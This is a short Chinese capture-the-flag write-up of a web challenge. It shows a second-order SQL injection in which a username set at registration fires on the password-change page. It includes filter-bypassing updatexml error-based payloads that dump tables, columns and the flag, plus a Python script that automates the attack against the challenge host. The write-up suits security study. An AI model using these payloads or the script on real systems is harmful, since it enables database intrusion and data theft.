注册账号登录
fuzz测试,发现关键字被过滤@ or and space(空格) substr mid left right handle
发现登录可以修改自己的账号密码
修改之后可以找到二次注入,既注册账号 username 处注入可以在 修改密码处回显
注入语句
查表
username=xx”||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#
查字段
发现输出长度有限制
username=xxx”||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name=’users’)&&(column_name)regexp(‘^r’))),1))#
查询字段内容
xxxx”||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp(‘^f’))),1))#
发现flag只输出一半
~flag{9489c8dc-433e-4b90-b391-55~
接着再逆序输出一波
xxxxx”||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp(‘^f’)))),1))#
~}c68a97998e55-193b-09b4-e334-cd~
成功得到flag
看看perid师傅的jio本
import requestsurl_reg = 'http://ec5befee-3784-4aaa-b457-255e4b859a1f.node3.buuoj.cn/register.php'url_log = 'http://ec5befee-3784-4aaa-b457-255e4b859a1f.node3.buuoj.cn/login.php'url_change = 'http://ec5befee-3784-4aaa-b457-255e4b859a1f.node3.buuoj.cn/changepwd.php'pre = 'peri0d"'suf = "'))),1))#"s = 'abcdefghijklmnopqrstuvwxyz1234567890's = list(s)r = requests.session()def register(name):data = {'username': name,'password': '123','email': '123',}r.post(url=url_reg, data=data)def login(name):data = {'username': name,'password': '123',}r.post(url=url_log, data=data)def changepwd():data = {'oldpass': '','newpass': '',}kk = r.post(url=url_change, data=data)if 'target' not in kk.text:print(kk.text)for i in s:paylaod = pre + "||(updatexml(1,concat((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + sufregister(paylaod)login(paylaod)changepwd()
若有收获,就点个赞吧
0 人点赞
